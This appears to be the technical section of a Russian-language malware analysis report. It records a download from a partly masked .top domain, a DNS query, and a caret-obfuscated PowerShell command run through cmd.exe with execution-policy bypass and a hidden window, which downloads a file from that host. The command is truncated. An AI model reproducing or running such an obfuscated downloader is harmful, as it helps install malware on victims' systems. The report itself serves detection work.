Техническая информация
- http://do###oop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^e^R^SHeL^L^.e^XE -ExEc^utionPO^LIC^y^ ^By^p^a^s^S^ -^n^OPROfIlE -WindO^WSTY^Le^ hIddEN (N^e^W^-O^B^JeCT ^Sy^StE^m.n^eT^.W^ebc^LI^en^T).d^oWn^LO^a^d^f^Il^e(^'http://do###oop.to...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "pOW^e^R^SHeL^L^.e^XE -ExEc^utionPO^LIC^y^ ^By^p^a^s^S^ -^n^OPROfIlE -WindO^WSTY^Le^ hIddEN (N^e^W^-O^B^JeCT ^Sy^StE^m.n^eT^.W^ebc^LI^en^T).d^oWn^LO^a^d^f^Il^e(^'http://do###oop.to...' (со скрытым окном)